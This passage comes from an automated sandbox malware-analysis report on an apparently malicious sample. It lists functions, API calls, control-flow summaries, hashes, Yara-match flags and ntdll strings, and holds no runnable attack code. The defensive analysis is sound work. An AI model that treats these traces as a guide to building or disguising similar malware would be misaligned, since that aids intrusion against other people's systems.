                                                                                                                    • Opcode Fuzzy Hash: 37e74598433bc19dac2249144a5474829b2697c4e56e8bd10754ecfd5cd93b81
                                                                                                                    • Instruction Fuzzy Hash: D890026134140483D10071985414B060005D7E1301F56C025E1064554DC65DCD526226
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: d30b1167c4abf5f85483d5a539e8eb459fb2cc9a1d2196c25f74a50de8344b3d
                                                                                                                    • Instruction ID: 105ce088e8f11db47aedced60379d4c8a70aa79e0d5fae638940331f608d3a85
                                                                                                                    • Opcode Fuzzy Hash: d30b1167c4abf5f85483d5a539e8eb459fb2cc9a1d2196c25f74a50de8344b3d
                                                                                                                    • Instruction Fuzzy Hash: B190027120140443D14071985404746000597D0301F56C021A5064554EC69D8ED56765
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: a263c18b818c3a02788004bfc033e13dbc3fdd8a4ab49695655d5ee5dbbb4954
                                                                                                                    • Instruction ID: f29310584c577fa60d79f26e82f37f9e97f591df1222eafd88e16e34625ee0d3
                                                                                                                    • Opcode Fuzzy Hash: a263c18b818c3a02788004bfc033e13dbc3fdd8a4ab49695655d5ee5dbbb4954
                                                                                                                    • Instruction Fuzzy Hash: BF90022160140543D10171985404616000A97D0241F96C032A1024555ECA698A92A231
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                                                                                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                                                                                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID: 6EA
                                                                                                                    • API String ID: 1279760036-1400015478
                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408393 Relevance: 1.7, APIs: 1, Instructions: 198threadwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 204 408393-408396 205 408398 204->205 206 40831e-40832b call 41be60 204->206 207 40839a-4083f8 call 41be60 call 408310 call 41b750 205->207 208 40832d-40835a call 41ca00 call 40acf0 call 414e50 205->208 206->208 223 408400-408432 call 40f670 call 41a500 207->223 224 40835c-40836e PostThreadMessageW 208->224 225 40838e-408392 208->225 234 408434-40843c 223->234 235 408467-40846f 223->235 227 408370-40838a call 40a480 224->227 228 40838d 224->228 227->228 228->225 236 408456-408460 234->236 237 40843e-408445 234->237 236->223 238 408462-408465 236->238 237->236 239 408447-40844e 237->239 241 40848d-40849f call 41a490 238->241 239->236 240 408450-408454 239->240 240->236 242 408470-40848a call 41bde0 240->242 241->235 247 4084a1-40850c call 419d10 241->247 242->241 247->235 250 408512-40856e call 419d50 247->250 250->235 253 408574-4085c1 call 41b3f0 call 41b410 call 41c0d0 call 41bde0 call 414a50 250->253
                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 02f55981e81b73c0aaff2cdcd70b9f4474209430eb3722391bffa8c20b3524a8
                                                                                                                    • Instruction ID: c149f646bb3ac724bd3f4bcda6c622af986896684f705b1abd693d5e92a4a067
                                                                                                                    • Opcode Fuzzy Hash: 02f55981e81b73c0aaff2cdcd70b9f4474209430eb3722391bffa8c20b3524a8
                                                                                                                    • Instruction Fuzzy Hash: AA61E870900309AFDB14DF64CC86FEB77B8EB48704F00056EF949A7281DB7469418BA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040830A Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 272 40830a-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 283 40835c-40836e PostThreadMessageW 272->283 284 40838e-408392 272->284 285 408370-40838a call 40a480 283->285 286 40838d 283->286 285->286 286->284
                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 8148d28b8101d793a0cc8cdf24b4d634cfb36b5517184f81131a4c3c08dde540
                                                                                                                    • Instruction ID: 8af516beb37efecd382e9161f9a88d8a91a234df46c9fb7fb9f0a948c6c37232
                                                                                                                    • Opcode Fuzzy Hash: 8148d28b8101d793a0cc8cdf24b4d634cfb36b5517184f81131a4c3c08dde540
                                                                                                                    • Instruction Fuzzy Hash: 6F01B531A8032876E721A6919C43FEE762C5B41B54F04011AFF04BA1C2E6A8690546EA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 289 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 300 40835c-40836e PostThreadMessageW 289->300 301 40838e-408392 289->301 302 408370-40838a call 40a480 300->302 303 40838d 300->303 302->303 303->301
                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A7C4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 321 41a7c4-41a7c7 322 41a751-41a774 call 41af60 321->322 323 41a7c9-41a7ea call 41af60 321->323 326 41a7ef-41a804 LookupPrivilegeValueW 323->326
                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: 284c9289ffc9d544ae1510350df14dabb2eefd94cef46bceb853b1983e75ec7e
                                                                                                                    • Instruction ID: 56766dddafe7108a3991a50c3b43d4056644d96470b386e15c9ef5dd98240c59
                                                                                                                    • Opcode Fuzzy Hash: 284c9289ffc9d544ae1510350df14dabb2eefd94cef46bceb853b1983e75ec7e
                                                                                                                    • Instruction Fuzzy Hash: 58016DB2600204AFCB24EF59DC41EEB3769EF88324F118559FD0C97242CA35E9518BB5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 339 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3298025750-0
                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: bb1e3cb4bb50ca157ff9c9b24bda18b534e8ec6d60e48b22c7a9885e0afc3def
                                                                                                                    • Instruction ID: 40e5e1a2cab825b24de6f3df1a4257f960e8001e312523f40b897f1bb9f50e05
                                                                                                                    • Opcode Fuzzy Hash: bb1e3cb4bb50ca157ff9c9b24bda18b534e8ec6d60e48b22c7a9885e0afc3def
                                                                                                                    • Instruction Fuzzy Hash: D3B09B719015C5C6DA11F7A45608717790077D0701F16C072E2030641F877CD5D1E275
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 01A72349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-2160512332
                                                                                                                    • Opcode ID: 1d86862e5c03452616bc32c9099d530e7eb5087d8917c34c381d46bc91ff294e
                                                                                                                    • Instruction ID: 06787be2d3308db02c0d47c7801997a220d86f8ab9a2989aa191f79d61c958f6
                                                                                                                    • Opcode Fuzzy Hash: 1d86862e5c03452616bc32c9099d530e7eb5087d8917c34c381d46bc91ff294e
                                                                                                                    • Instruction Fuzzy Hash: AD926B71604342ABE721DF29CC80B6BBBE8BF84754F04492EFA95D7251D770EA44CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A28620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A654E2
                                                                                                                    • corrupted critical section, xrefs: 01A654C2
                                                                                                                    • double initialized or corrupted critical section, xrefs: 01A65508
                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01A65543
                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A654CE
                                                                                                                    • Critical section debug info address, xrefs: 01A6541F, 01A6552E
                                                                                                                    • Critical section address., xrefs: 01A65502
                                                                                                                    • Address of the debug info found in the active list., xrefs: 01A654AE, 01A654FA
                                                                                                                    • Thread identifier, xrefs: 01A6553A
                                                                                                                    • undeleted critical section in freed memory, xrefs: 01A6542B
                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A6540A, 01A65496, 01A65519
                                                                                                                    • Critical section address, xrefs: 01A65425, 01A654BC, 01A65534
                                                                                                                    • 8, xrefs: 01A652E3
                                                                                                                    • Invalid debug info address of this critical section, xrefs: 01A654B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                    • API String ID: 0-2368682639
                                                                                                                    • Opcode ID: 293caf71fed718d3dc7b80c90ebf4e5ea614b2ac53eba74d3de0ba6c3e5f1dac
                                                                                                                    • Instruction ID: a1bd3aa17feaf6eacc76df7133097ccd7218e494642866e533afb34e6103a80a
                                                                                                                    • Opcode Fuzzy Hash: 293caf71fed718d3dc7b80c90ebf4e5ea614b2ac53eba74d3de0ba6c3e5f1dac
                                                                                                                    • Instruction Fuzzy Hash: 3A818BB0E40358AFDB20CF99C845FAEBBF9BB88B14F148159F508B7281D775A945CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A62412
                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A62624
                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A62506
                                                                                                                    • @, xrefs: 01A6259B
                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A625EB
                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A62602
                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A6261F
                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A62498
                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A62409
                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A624C0
                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A622E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                    • API String ID: 0-4009184096
                                                                                                                    • Opcode ID: beccc9cf789be0ea867c4484d67417dfe6553a66eea9a5f73713c3322e41dc5a
                                                                                                                    • Instruction ID: aa3523ef5ca7467df8756b2f62dc01ce07b42ecd0d0d74545fa00b12335901e1
                                                                                                                    • Opcode Fuzzy Hash: beccc9cf789be0ea867c4484d67417dfe6553a66eea9a5f73713c3322e41dc5a
                                                                                                                    • Instruction Fuzzy Hash: 9B025EF1D002299FDB31DB58CD84BEAB7B8AB54704F4441EAE609A7241EB309F84CF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A98B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                    • API String ID: 0-2515994595
                                                                                                                    • Opcode ID: 0fe925b781ab3b73a18e44edcd22bda8b88f11bd65f466477b69561022de0efc
                                                                                                                    • Instruction ID: 2914a22df2720a7a124cfdd113bc97f242bdafe42b77ba441758b205d6965715
                                                                                                                    • Opcode Fuzzy Hash: 0fe925b781ab3b73a18e44edcd22bda8b88f11bd65f466477b69561022de0efc
                                                                                                                    • Instruction Fuzzy Hash: 8351E2715043599FCB29CF18C884BABBBE8EFD6644F14091DFA99C3240E778D588CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AA0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                    • API String ID: 0-1700792311
                                                                                                                    • Opcode ID: d88fd417eb4d1176e32184b3af9a601dbb01178c4699a3dc12d1cc345705fbdf
                                                                                                                    • Instruction ID: 67c428d648720373be88cc3100429b2f2f8f09b5237d5e5775627cfe38860dc7
                                                                                                                    • Opcode Fuzzy Hash: d88fd417eb4d1176e32184b3af9a601dbb01178c4699a3dc12d1cc345705fbdf
                                                                                                                    • Instruction Fuzzy Hash: FAD1EF35A00786DFDB22DF68C544AADBBF2FF8A714F488059F48A9B252C734E941CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 01A78B8F
                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A78A67
                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A78A3D
                                                                                                                    • VerifierFlags, xrefs: 01A78C50
                                                                                                                    • VerifierDlls, xrefs: 01A78CBD
                                                                                                                    • VerifierDebug, xrefs: 01A78CA5
                                                                                                                    • HandleTraces, xrefs: 01A78C8F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
